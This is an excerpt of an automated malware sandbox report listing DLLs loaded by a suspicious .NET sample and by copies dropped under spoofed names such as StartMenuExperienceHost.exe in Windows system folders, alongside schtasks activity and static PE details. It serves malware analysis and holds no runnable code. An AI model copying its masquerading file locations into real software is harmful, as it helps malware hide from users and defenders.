Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: sspicli.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: mscoree.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: apphelp.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: version.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: uxtheme.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: windows.storage.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: wldp.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: profapi.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: cryptsp.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: rsaenh.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: cryptbase.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: sspicli.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: mscoree.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: version.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: uxtheme.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: windows.storage.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: wldp.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: profapi.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: cryptsp.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: rsaenh.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: cryptbase.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: sspicli.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: mscoree.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: apphelp.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: kernel.appcore.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: version.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: uxtheme.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: windows.storage.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: wldp.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: profapi.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: cryptsp.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: rsaenh.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: cryptbase.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: sspicli.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: mscoree.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: kernel.appcore.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: version.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: uxtheme.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: windows.storage.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: wldp.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: profapi.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: cryptsp.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: rsaenh.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: cryptbase.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: sspicli.dll
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Section loaded: mscoree.dll
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Section loaded: apphelp.dll
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Section loaded: version.dll
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Section loaded: uxtheme.dll
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Section loaded: windows.storage.dll
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Section loaded: wldp.dll
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Section loaded: profapi.dll
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Section loaded: cryptsp.dll
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Section loaded: rsaenh.dll
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Section loaded: cryptbase.dll
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Section loaded: sspicli.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: mscoree.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: version.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: uxtheme.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: windows.storage.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: wldp.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: profapi.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: cryptsp.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: rsaenh.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: cryptbase.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: sspicli.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: ktmw32.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: wbemcomn.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: amsi.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: userenv.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: dnsapi.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: winnsi.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: rasapi32.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: rasman.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: rtutils.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: mswsock.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: winhttp.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: winmm.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: winmmbase.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: mmdevapi.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: devobj.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: ksuser.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: avrt.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: audioses.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: powrprof.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: umpdc.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: msacm32.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: midimap.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: edputil.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: dwrite.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: windowscodecs.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: ntmarta.dll
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Section loaded: dpapi.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: mscoree.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: kernel.appcore.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: version.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: uxtheme.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: windows.storage.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: wldp.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: profapi.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: cryptsp.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: rsaenh.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: cryptbase.dll
Source: C:\Users\Default\SystemSettings.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\lv961v43L3.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: lv961v43L3.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: lv961v43L3.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: lv961v43L3.exe Static file information: File size 3554304 > 1048576
